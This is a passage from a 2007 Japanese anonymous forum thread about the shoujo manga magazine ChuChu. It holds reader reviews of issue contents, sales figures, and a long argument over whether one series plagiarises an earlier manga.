雰囲気出せるだろうけど、個人的にはかえってキャラの気持ちやいいたいことが理解できにくいし。
絵はちゃお向けだと思うけど、話は深く考えられてないっていうか奥が狭い。子供だましかどうかは
わからないけど、(ちゃお世代にはウケそう)中学生以上にはあまり惹きつけられないんじゃ?
エロ描写も、はっきりいって今までの連載には必要なかった気もするし。




94 :花と名無しさん:2007/10/27(土) 12:11:10 ID:???O
やがみんが前にちゅちゅで書いた家庭教師の話は面白いと思ったよ。
エロ抜きで面白い話も普通に書けるのでぜひちゅちゅに来てほしい。
ちゅちゅのマンガ家は絵は上手いけど全体的に地味だし..

95 :花と名無しさん:2007/10/27(土) 12:53:45 ID:???O
>>90
そういう作家もいるとは思う
>>88の編集が引き止めに入ってるから相当無理してるって話が
大袈裟というか、ちゃおで無理してる箇所があるなら作品読んでる限り
せいぜいエロ描写の限度って程度じゃんwと言いたかっただけ

>>91
しゅごキャラなんて一部にしか知られてなくない?
矢沢さんは有名だけど

96 :花と名無しさん:2007/10/28(日) 12:52:25 ID:???O
八神さんのプラチナ、最後ケツまくって上流階級社会を否定するのかと思ってた。

97 :花と名無しさん:2007/10/29(月) 00:14:14 ID:???0
「六花ちゃんの恋 おかわり」って・・・
池沢理美の「ぐるぐるポンちゃん おかわりッ」のパクリですか
同じ犬漫画だし


98 :花と名無しさん:2007/10/29(月) 03:57:03 ID:???0
いや〜…。犬と言えばおかわりでしょう。

99 :花と名無しさん:2007/10/29(月) 09:28:41 ID:???O
>>97
誰でも浮かびそうなアイデアだしこんなのはパクリとは言わないんじゃない?
前のゆきのん×砂時計発言やさくら×スクイズ発言といい、安易にパクパクと言い掛かりをつける厨が涌いてる希ガス
…パクリ沢とさゆみんのは黒だったと思うけどねw

100 :花と名無しさん:2007/10/29(月) 17:07:19 ID:???0
>>99
さゆみんのパクリってなに?初耳ではないけど、どんな作品の模写(?)かがわからない
小金沢さんみたいに公にされててみんな知ってるワケじゃないよね


101 :花と名無しさん:2007/10/29(月) 21:19:58 ID:???0
前スレから転載

>771花と名無しさんsage2007/08/14(火) 15:49:07 ID:???0
>
>今月号読んだけど、さゆみそのエピソードパクじゃないか?
>電車内で友達に無理に話題をふってあの店なら限定レア物あるかもしれないよって伝えようとするところ。
>別の作品で、バスの車内で片思い中の男の子がマイナーCD捜してるけど見つからないって話してるのを聞いて
>主人公が同じように「あの店ってけっこうレア物置いてるんだよね」と突然友達に話題を振るのを装って伝える
>後日「行ったけどなかった。でもおしえてくれてありがとう」って男の子に告げられる、というのを読んだ。
>ベツコミの「春行きバス」だと思って見返してみたけどみつからなかった
>たしか1話完結オムニバスか読みきりでここ1・2年以内の作品だったはず
>ベツコミじゃなかったらりぼんの増刊かも。絶対読んだんだがなー
>他に知ってる人いない?


102 :花と名無しさん:2007/10/29(月) 21:50:50 ID:???P
もしかして彩原そのの作品?
ありきたりな作風だからサヨミソのはただの被りかなとオモタが

103 :花と名無しさん:2007/10/29(月) 22:24:01 ID:???O
彩原その?は?誰の話?
てかそんな作家シラネw

検証では確かベツコミ小畑さんの漫画と比較されてなかったっけ?

104 :花と名無しさん:2007/10/30(火) 05:33:47 ID:???O
>>100
補足しますね
ちゅちゅ前スレとパクリ報告スレで今連載中の星栞の第1話に小畑友紀さんの初期コミックス「君の勝ち」からのエピソードパクが2件指摘されました。
当時ピクトに検証サイトも作られて同じコミックスから2件なので偶然ではないだろうって言われたけど
トレースと違ってエピパクは完全検証は難しく住人の中ではおそらく黒だねって結論になっただけで終了。
この件に関して小学館からの発表はありませんでした。
こんな感じ

105 :花と名無しさん:2007/10/31(水) 13:55:41 ID:???O
なんかパクリ疑惑の話題が出てるので便乗
『六花ちゃんの恋』は別マで連載してた『まっすぐにいこう。』のパクリじゃないかなぁと連載当初から思ってた。
検証だすほどではないんだけど、六花ちゃんの出てくるキャラ名とまっすぐのキャラ名がかぶり(?)があったりする。
育実→郁(主人公、漢字うろ覚え)
六花→六花(まっすぐにいこう作中に出てくるプードル犬の名前)
だったり、ストーリーがケンタ(犬)目線で進んでいく所とか散歩デートとか、ケンタと育実の不仲具合とか
色々ともにょった('A`)

106 :花と名無しさん:2007/10/31(水) 17:16:10 ID:???0
>>104


なんか思うけど、少女漫画でもありとあらゆるネタが使い古されて正直もうネタ切れ?絞りきられてスカス〜カのスポンジ状態?
ホントにパクったかどうかは本人じゃないとわからんけど、逆に言うと新鮮みのある読んだことないネタ描くほうが大変だよな

話ずれるが陣名が好き。デビュー後何年経過してもフレッシュだし、いつもしっかり読者目線で話描いてくれる。

107 :花と名無しさん:2007/10/31(水) 21:50:11 ID:???0
六花がまっすぐに似てるってのは私も思ってた。
ケンタが彼氏に絶対なつかないところとか。
でも主人が相手を好きで好きで仕方ないのが
分かるから、気持ちは応援してる、という風なところとか。
でも主人公や彼氏のキャラはまったく違うし、
状況も違うから、いいかと思って読んでる。


そして私も陣名が好きだw

108 :花と名無しさん:2007/11/01(木) 01:29:19 ID:???0
たぶん、その漫画を下敷きにしてるんだと思う。
名前を被らせてるのは、遊び心でしょう。
気付いた人はニヤリとしてね、と。

109 :花と名無しさん:2007/11/01(木) 01:40:11 ID:???0
オマージュってやつか>名前遊び

そして私も陣名が好きだw
ヌミエール様のゲームってアンジェリークのパロディーだよね?
こちらも遊び心

110 :花と名無しさん:2007/11/01(木) 01:52:46 ID:???0
文教堂の雑誌売上ランキング
10月号ちょっと回復!
18 (19) 1611110 ちゅちゅ 小学館 20070914 996

111 :花と名無しさん:2007/11/01(木) 14:51:40 ID:???0
オマージュなら本人に許可取らなきゃいけないんじゃ…
作品や作者を尊重しているって言う旨を公表する義務もあるし

112 :花と名無しさん:2007/11/01(木) 18:31:10 ID:???O
>>108
いや、それはニヤリじゃすまねーだろw
漫画の一コマにちょこっと出演してんならともかく
既存の漫画をベースにした時はただのパクリじゃん

113 :花と名無しさん:2007/11/01(木) 18:40:52 ID:???0
おおばやしさん2月号から新連載って既出?

114 :花と名無しさん:2007/11/01(木) 22:59:46 ID:???0
>オマージュなら本人に許可取らなきゃいけないんじゃ…
>作品や作者を尊重しているって言う旨を公表する義務もあるし

すいません。初めて知りました。

115 :花と名無しさん:2007/11/01(木) 23:41:47 ID:???O
>>106
このスレの住人は陣名さん大好きだね

自分は陣名キャラがいつまでたっても魅力的に感じられない
絵柄も90年代の香りがして古いし、、、
メイドやメガネに萌えない自分の感性のせいかもしれないけどw
感じ方は人それぞれだな

116 :花と名無しさん:2007/11/02(金) 01:25:27 ID:???0
>>105
検証してもみようと思って調べたけど
女の子の名前、いくみでなく郁子(いくこ)だったぞ。
それ以外の指摘もパクリと言える内容ではないと思うが・・・
脇役の犬と主人公の名前が一緒なので許可がいるのか?
だいたい散歩デートしてるからパクリって発想がどこからきたんだ??
犬漫画で散歩のシーンがないのってどうなのよ?

あと前にゆきのんが砂時計パクってるって発言した人もいたけど、
全然そんなことなかったぞ。
もし初潮の部分がパクリっていうなら
オマエは小学生かと小一時間問い詰めたい。

117 :花と名無しさん:2007/11/02(金) 01:38:11 ID:???0
>>116です。
あらためて自分の書き込みを見直したけどちょっと強く言い過ぎました。
すいません。
でも、このところどう考えてもパクリでないような内容を
パクリと騒ぐ幼稚なレスが多い気がしたのでちょっとムキになっちゃいました。


118 :花と名無しさん:2007/11/02(金) 03:12:06 ID:???O
>>113
さくら5巻の折り込みに告知されてたね。

>>116-117 同意。
もし、>>105 が言うように犬目線で話しが進んで、
散歩デートをして、飼い主の思い人に犬が嫉妬するのがパクリと言うなら
例えば自分の好きなタアモさんの「あの子とぼくのいえ」もまっすぐのパクリになるのかな?
他にもそんな漫画はありそうだし、やはりその主張はおかしいと思う。


119 :花と名無しさん:2007/11/02(金) 08:37:14 ID:???O
消房厨房のパクリ発言も呆れるよな
関西弁の主人公が出てきただけでラブコンのパクリ
逆ハー設定なだけで花男パクリ
主人公の名前、髪型、性格設定少しでも自分の脳内にある
記憶と被るだけでパクリと言いたがる
そんな設定や話ウン十年も前から色んな作家が使い回してきたと
言いたくなるよな
タアモさんのはオムニバス設定だからそんな気にならん

120 :花と名無しさん:2007/11/02(金) 08:43:41 ID:???P
つかスレの平均年齢が明らかにちゅちゅ読者のダブルスコア…

自分もだがorz

121 :花と名無しさん:2007/11/02(金) 10:49:24 ID:???0
ななぷーは何歳ですヵ?私は8歳です。

122 :花と名無しさん:2007/11/02(金) 13:11:55 ID:???O
>>105です。
書き方がおかしかったみたいで混乱させてしまったようです。すみません
パクリ疑惑とは書きましたが検証を出す程ではないです。
まっすぐのコミクスも手離していて手元にないですし
ただ、まっすぐの主人公、作中ではずっと『郁』と呼ばれているので育実、六花と出てきたので
アーッ!!となりました。
漫画のふいんき(なぜか)もそっくりだし、1話目から素直に読めなかった。
読後の感想だと思ってください。

>たぶん、その漫画を下敷きにしてるんだと思う。
名前を被らせてるのは、遊び心でしょう。
気付いた人はニヤリとしてね、と。

実際に作家や編集がまっすぐを下地にして話を作ってたりすれば、
それがやっちゃいけない事だと知らなかったとしてもパクリ確定だし、幻滅する。

123 :花と名無しさん:2007/11/02(金) 13:54:30 ID:???O
検証出すほどではないならいちいち言わなくていいよ>>122
そもそもまっすぐを下敷きにしたってソースはあるの?まさかふいんき(なぜかry)が似てるだけ…?
騒ぐなら疑惑投げっぱなしでなくちゃんと検証も汁!

124 :花と名無しさん:2007/11/02(金) 16:19:32 ID:???O
まっすぐに似てたからもにょったって言ってるだけでそ?
もし本当に下敷きにしていたなら幻滅するってだけで断定はしていないし
ソース出せとか言われても…
それとも検証出来るもんならやってみなっていう開き直りですか?w

125 :123:2007/11/02(金) 17:19:30 ID:???O
開き直りってwなんでそうなる?
自分はちゃんと検証してから発言しないと無責任じゃないのって言いたいのだけど。
検証されたらあなたの意見を応援しますよ。
パクリは犯罪なんだから軽々しくパクリと言わない方がいいと思う。
これが>>106のような書き方だったら別に波紋は呼ばなかっただろうに



126 :花と名無しさん:2007/11/02(金) 17:27:28 ID:???0
下敷きにしたってのは>>108の意見であって
パクリじゃないか?と投げかけた人の意見じゃない

127 :123:2007/11/02(金) 17:27:49 ID:???O
間違えました>>106でなく>>107でした。
>>107は「パクリ」でなく「似ている」って表現を使っているし
どういう事がパクリでどういう事がパクリでないかをちゃんと考えて発言してそう

128 :花と名無しさん:2007/11/02(金) 18:06:57 ID:???0
>>105>>124も同じ人??)

もしあんたが満員電車に乗っているサラリーマンで
いきなり女子高生が
「この人痴漢です!エロい顔してるし
 触ったのは見てないけど隣にいたから多分この人です。」
などといういい加減な理由で疑いをかけられ
「じゃ!鉄道警察の人あとはよろしく」って女子高生は去ってしまい
無実なのに周りのうわさで会社も首になり家庭も崩壊などしたらどうなの?

・・・我ながら微妙な例えだと思ったが・・・orz
でもそんな感じ。
検証を出す程ではないのならパクリって言わないほうがいいとオモ。

129 :花と名無しさん:2007/11/02(金) 18:33:47 ID:???0
そもそも疑問なんだが
既存作品を下敷きに無許可で新しい作品をつくるのってが必ずしも犯罪なの?
「下敷きに無許可」って書くといかにもアウトのように思うけど
全部が全部そうじゃないよね。下敷きの程度によると思う。
下敷きにするつもりがなくても
後発の作品は同じテーマで成功している作品の影響はなんらか受けるもんだろうし
まったく違うってのはまずないでしょう。

たとえばガンダムの元アイデアはSF小説『宇宙の戦士』だったり
そのガンダムはマクロスやエヴァに影響を与えたよね?
で、それらが許可を取って作ったかどうか。
多分とってない。ってか取る必要ない。(いい例えが浮かばずアニメになってすまそ)

>>105>>108が言う下敷きってのが許可がいる程度なのか
いらない程度なのかのを検証すればいいと思う。

130 :花と名無しさん:2007/11/02(金) 19:47:40 ID:???O
まだこの話続けんの?
たとえ別マの既存作品を下敷きにしてたとしても六花のナントカなんて
全然知名度ないし売れてもないし雑誌内でもたいした存在価値ないし
設定活かしきれてないのが痛過ぎて何なのコレってぐらいじゃん

後、昨日からやたらとパクリじゃないよぉと必死にかばう人登場したけど
余計煽ってますよw

131 :花と名無しさん:2007/11/02(金) 22:30:33 ID:???0
いいかげん、この話題うざい
もうパクリ話はここでやって
つ「少女漫画パクリ盗作・検証・議論4」
http://anime2.2ch.net/test/read.cgi/gcomic/1158084845/

132 :花と名無しさん:2007/11/03(土) 01:29:55 ID:???0
六花はパクリ云々よりもいくみにイライラする
どーせいくみが最後にちょっと何かしただけで元に戻って終わるんだろうなー
主人公の彼氏キャラでこんなにムカつくの久々だわ

133 :花と名無しさん:2007/11/03(土) 10:36:43 ID:???0
んだんだ。とりあえず、結論は「パクリというほどでは全くない」ということで。
以上!終わり!さよなら!

134 :花と名無しさん:2007/11/03(土) 11:05:02 ID:???O
ちゃおの水都さんのよかったな。
ちゃおのクリスマス度もアップしてたし。
来月部数伸びるかな?
ちゅちゅ買いたいって言ったちゃおっ娘のお母さんチェックをパス出来る様に紐かけない方がいいな。

135 :花と名無しさん:2007/11/03(土) 11:16:51 ID:???P
付録が付くからチェック無理だし宮脇はちょwだし

136 :花と名無しさん:2007/11/03(土) 18:46:02 ID:???0
パクリで男キャラが最強にムカつく六花おかわりってchuchuでは異色だな

137 :花と名無しさん:2007/11/04(日) 11:00:02 ID:???0
創刊期に比べると、陣名さんと七島さんの漫画が面白くなってきてる気がする。
高宮さんは薄く窓口を広げた結果、以前からの読者を離し新しい人にわからないノリの漫画になってる気がする。

個人的にはスレでは不評の姫川さんにちゅちゅにきてほしい。
最初は全く受け付けない作風だったのに、いつのまにか癖になった・・・。

もう少しエロ度成分低くして、水都さんっぽい方向性で濃いのかいてくれないかな。

138 :花と名無しさん:2007/11/04(日) 13:53:56 ID:???O
>姫川さんがくせになる
なんかわかるよ〜
自分も最初受け付けなかったけど、毎回お約束の乱闘シーンとか独特のネーミングセンス&ファッションセンスなんかにもう目が離せなくなってしまったよ
↑【注】褒めているのです

139 :花と名無しさん:2007/11/04(日) 16:33:06 ID:???O
>>137>>138
ふーん、、、
江頭2:50とかルー大柴みたいなもんかw

140 :花と名無しさん:2007/11/04(日) 20:29:53 ID:???0
一応ちゅちゅ所属ではないの>姫川さん

141 :花と名無しさん:2007/11/05(月) 04:42:32 ID:???0
パクリおかわり!の育実は極悪

142 :花と名無しさん:2007/11/05(月) 08:03:12 ID:???0
ちゅちゅ所属なの?
ちゃおかと思った。

143 :花と名無しさん:2007/11/05(月) 10:49:29 ID:???O
白衣シリーズはちゃおDX掲載だったけど
デビューもちゅちゅだったし、コミックスもちゅちゅコミだからね

144 :花と名無しさん:2007/11/05(月) 21:00:29 ID:???0
>>134
今までが連載続いたからか、モノローグとかちょっとへぁ?なトコあったけどね=水都さん
タイトル『〜の』で終わったからラストにでも続き出るかと思ってたよ。
1P目、出だしのモノローグも。続きは?って思ったな。その辺ちょっと不完全燃焼だったけど季節感あるしいいと思った。
けどやっぱりちょっとちゃおだと浮いちゃうかな?『ちゅちゅ』だと全く違和感ないが。おおばやしさんや宮脇さんと並んでも。

145 :花と名無しさん:2007/11/13(火) 23:03:02 ID:ruhW5LVIO
発売日age

146 :花と名無しさん:2007/11/14(水) 01:30:06 ID:???0
発売か
そのうち買おう

147 :花と名無しさん:2007/11/14(水) 16:58:41 ID:???0
天麩羅投下

【表紙/杉山】

【アンタなんて(新)/杉山】
【うそつき/ゆきのん】
【キミ好き/みっぞん】
【ココロ(新)/七島】
【乙女道/陣名】
【はじまりの(読切)/七瀬】
【さくら(終)/ばやし】
【恋悩王子(読切)/京町】
【星栞/さゆみん】
【迷子(読切)/中嶋】
【ひとひら/やぶ】
【六花おかわり/にみ】

【ドキズキ/笹木】
【いったもん/陣名】

【マンガゼミナール】
【次号予告】

【総評】

148 :花と名無しさん:2007/11/14(水) 23:53:34 ID:???0
ttp://www.chuchu.jp/download/
よし、来た。壁紙陣名さん

149 :花と名無しさん:2007/11/15(木) 00:18:59 ID:???0
さっそく羅列

【表紙/杉山】杉山さん初表紙?オメ。いろんな意味で普通な感じ。

【アンタなんて(新)/杉山】 逆ハー路線?理由も無く男女同室なんて無理ありすぎだろ…
【うそつき/ゆきのん】 妙に画面が白っぽかった。時間なかったのかな。
【キミ好き/みっぞん】 ミノルはどの程度のミュージシャンなのかという疑問が発生。
              ただのストリートミュージシャンかと思ってたのに。
【ココロ(新)/七島】 さわやか〜。男の子の書き方少し変わったかな?
【乙女道/陣名】 ありすの好感度アップだー。彗月フラグっぽい?
【はじまりの(読切)/七瀬】 絵もノリも90年代だなあ
【さくら(終)/ばやし】 この内容2回くらいでゆっくりやっても良かったのに…とりあえず乙。
【恋悩王子(読切)/京町】 男装王子と普通に男の王子って、客層が違うのでは
【星栞/さゆみん】 なんか…話の盛り上がりについていけない
【迷子(読切)/中嶋】 べつにひっぱたくこと自体は…あれだけされたんだしいいような気も。
【ひとひら/やぶ】 うまくいったねよかったね、では終わらなそうですね。期待。
【六花おかわり/にみ】 うーん…

【ドキズキ/笹木】 読んでません
【いったもん/陣名】 ケーキうまそう。

【マンガゼミナール】 みことタンデビューおめ!
【次号予告】 水都さんのプッシュすごいな!とりあえず素直に期待しておく。

【総評】 さくらが終わったというのに地味な読後感だった

150 :花と名無しさん:2007/11/15(木) 00:48:53 ID:???0
>>147さん乙です。
補足で以下もお好みで追加してください

今月特集
【水都あくあ応援PJ】
【Xmasカード&年賀状プレゼント】
【グラビア新垣結衣】
【ちゅちゅ新聞DX ChuChuガールアンケ】
【ふろく/ストラップ】

次号予告
【新連載】水都あくあ
【読みきり】高宮、こはく
【ふろく】2008カレンダー
・SPメッセージ 石原さとみ
・スーパーパーソナル占い
・福袋プレゼント
・キミうた最終回
その他
・コミックス購入者は抽選でオリジナル切手
・一部書店でオリジナル鉛筆配布中

151 :花と名無しさん:2007/11/15(木) 01:10:24 ID:???0
ちょっと前までは 七島>杉山 だったと思うんだけど
いつの間にか編集プッシュ逆転したねえ。
個人的には七島マンガのほうが好きだけど
杉山の、努力と根性でこの地位をもぎ取った!って感じはいいと思う。
一時のひどい扱われ方を見てしまったからな。

152 :花と名無しさん:2007/11/15(木) 01:29:37 ID:???O
もぎ取ったねぇ…どうなんだろ?
いわゆるメジャー誌ならともかく
もぎ取る程使える所属作家いねぇだろみたいな
この調子だと次はきららだなw

153 :花と名無しさん:2007/11/15(木) 08:22:49 ID:???P
あらいさん移籍フラグ立った?

つかまさかと思ってBPのクリスマスカード応募したのにデザインこっちの方がいいじゃないかと小一時間ry

154 :花と名無しさん:2007/11/15(木) 08:58:33 ID:???0
モンキャン2をやるべき。

155 :花と名無しさん:2007/11/15(木) 10:45:12 ID:???O
一応さくら前線の下絵掲載についてコメントが小さく載ってたね。
どうせなら公式HPやblogの方にも載せてくれた方が印象いいと思うなぁ…
その方が読者に伝わるの早いし。

156 :花と名無しさん:2007/11/15(木) 17:46:20 ID:???0
>>155
一応けじめはつけた、か
でも公式HPに載せるべき、には同意だな

157 :花と名無しさん:2007/11/15(木) 17:56:52 ID:???0
自分はいかにも編集が読者からの苦情を受けて載せました〜ってのがミエミエの書き方じゃなくて、
他誌でもやってるみたいな作者の直筆メッセージみたいなのは書いて欲しかった。イラスト入りとかまでムリしなくていいから。
HPやブログだと、(対象年齢考えて)ネット環境なくてみられない読者もいるだろし。

158 :花と名無しさん:2007/11/16(金) 06:10:57 ID:???0
【陣名/乙女道】素晴らしい…。感動だ。モンキャン読んでた頃の様な満ち足りた気分になれるぞよ。ありがとう、ありがとう。

159 :花と名無しさん:2007/11/16(金) 14:18:43 ID:???0
天麩羅ごちです

【表紙/杉山】 かわいい。胸元がなんかエロくていい

【アンタなんて(新)/杉山】 前作同様、主人公に勢いがあるので楽しめそう。
              杉山さんは初期の連載よりこの路線の方が好み
【うそつき/ゆきのん】 なんとなくこの展開は読めてた
【キミ好き/みっぞん】 次回最終回なのか〜。毎回作曲と漫画描くのは大変だろうね。
           しかし、このラジカセのデッサンはいかがなものか・・・
【ココロ(新)/七島】 ツカミは良かった。でも話のテンポや人物の思考にときどきついていけなくなることが
【乙女道/陣名】 メイド服イイ!!(・∀・)♪かつもくしてみました♪
        展開的になんとなくKICK!と同じく表紙をもらったけど3回連載くさい希ガス
【はじまりの(読切)/七瀬】 ファンタジー過ぎてちゃお向きっぽい話と思った。
【さくら(終)/ばやし】 もうあと2ページくらいあれば余韻にひたれそうなんだけど。そこが残念。
【恋悩王子(読切)/京町】 絵はかわいい。話は普通かな。
【星栞/さゆみん】 なんかもう、外野の生徒たちのノリについていけない
【迷子(読切)/中嶋】 Xmas読みきりの中で1番好きかな。
【ひとひら/やぶ】 「初恋」って…凪くん涙目。。
【六花おかわり/にみ】 先輩がなんかかわいいかった(ラスト以外は)。あとプードルとケンタのカラミもかわいい。

【ドキズキ/笹木】 微妙
【いったもん/陣名】 陣名っちと担当さん出演で実写で撮ったら結構面白そうでない?
【ちゅちゅ新聞】 さゆみんって結婚してたんだ

【グラビア新垣結衣】 ガッキーかわいいよガッキー
【次号予告】 あくあの新連載はAL10と似た感じの学園物になりそう?

【総評】 最近、毎回グラビアが載るようになったのね

160 :花と名無しさん:2007/11/16(金) 23:35:27 ID:???0
Xmasカード&年賀状プレゼントは誰が描いていて何の絵か教えて頂けませんか?

161 :花と名無しさん:2007/11/16(金) 23:59:54 ID:???0
たぶんコンピューターかなんかでやっている占いを有料って
よっぽどこの雑誌赤字を出しているんだろうか…と考えてしまう自分がいる

占い師が占うならそう明記するだろうし

162 :花と名無しさん:2007/11/17(土) 04:15:51 ID:???0
うむむ
文教堂の雑誌売上ランキング
11月号、陣名表紙なのに伸びなかったorz
18 (18) 1611111 ちゅちゅ 小学館 20071013 989

163 :花と名無しさん:2007/11/17(土) 23:49:09 ID:???0
うがぁ。かわええのぅ。
>乙女道壁紙

164 :花と名無しさん:2007/11/23(金) 00:08:35 ID:???0
ttp://chuchu-net.jp/blog/?tdate=2007-11-23-173
原稿に直接ビーズとか張ってるの?

165 :花と名無しさん:2007/11/23(金) 14:26:58 ID:???0
>>164
描いてるのかも
今年7月号の時の扉絵でラインストーン描いてたし

166 :花と名無しさん:2007/11/23(金) 23:19:59 ID:???0
え?これ本物のラインストーンじゃないの?

167 :花と名無しさん:2007/11/24(土) 01:57:17 ID:???0
本物貼ってると思う
りぼんでは何年か前から使われてたよ。市販のシールとかも。

168 :花と名無しさん:2007/11/26(月) 07:11:34 ID:???0
六花は彼氏がうざすぎ。読んでてイライラする
先輩が可愛いから読んでるけど。これ最後の方で先輩を悪者にして彼氏の株あげるとかやめてほしい

169 :花と名無しさん:2007/11/28(水) 21:03:20 ID:???O
2月号からばやし新連載
3月号から高宮新連載
4月号からあらい新連載
5月号からやぶ新連載

ちゃお情報

170 :花と名無しさん:2007/11/28(水) 21:07:01 ID:???O
>>155
なんて書いてあった?

171 :花と名無しさん:2007/11/28(水) 21:22:39 ID:???P
薮は…ひと恋まとまるのか?

172 :花と名無しさん:2007/11/29(木) 07:32:59 ID:???0
>>169
廃刊はいやだー!!!!!!!!という
変蒐サイドのうめきが聞こえてくるぞw

173 :花と名無しさん:2007/11/30(金) 23:33:42 ID:???0
(あらいさんより)みなるんくれ!

いや、ちっさいコーナーでいいからかけもちでもいいか。
陣名さん + 七島さんの読者ページ + みなるん・ショート
ん、いい感じかも。

174 :花と名無しさん:2007/12/01(土) 07:16:14 ID:???0
>>173
水無瀬いつるのことか?
あんなもんもらっても持て余すだけだろw

175 :花と名無しさん:2007/12/01(土) 10:55:37 ID:???0
水瀬さんとあらいさんは比較対象にならないでしょ・・・。
寺見たら絵、劣化してたし。

176 :花と名無しさん:2007/12/01(土) 10:57:25 ID:???P
三咲あやくれ!


177 :花と名無しさん:2007/12/01(土) 11:00:46 ID:???P
しがのが少コミリストラの噂立ってるな。いらないけど。

水瀬いつるはいらないが水瀬藍はゲスト扱いでも欲しいな。

178 :花と名無しさん:2007/12/02(日) 23:19:53 ID:???O
水瀬いつるってちゃお本誌で人魚やデジコの漫画描いてた人?人違いだったらすまん。
その頃は好きだったが。今はピンと来ないなあ。

179 :花と名無しさん:2007/12/03(月) 06:28:08 ID:???0
先月までネコの着ぐるみ着て全サの漫画に出てたよ。
みっなるーん。

180 :花と名無しさん:2007/12/03(月) 07:00:49 ID:???0
>>178
そうなんですよ川崎さん
ちゃお本誌ででじこの漫画や人魚ネタ漫画描いてたんですよ
>>179
そうそう、そーだったね

181 :花と名無しさん:2007/12/04(火) 00:49:40 ID:???O
>>180
川崎さん?
水無瀬いつるがでじこ描いてくれて嬉しかった。当時の絵柄好みだったし、でじこに似合う感じだった気が。

182 :花と名無しさん:2007/12/04(火) 13:14:15 ID:???O
でも水無瀬がフォモ同人イベントに出てた時点で絶望した
別に漫画家としては構わないんだろうが、当時自分的にショックだった

スレチスマソ

60 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)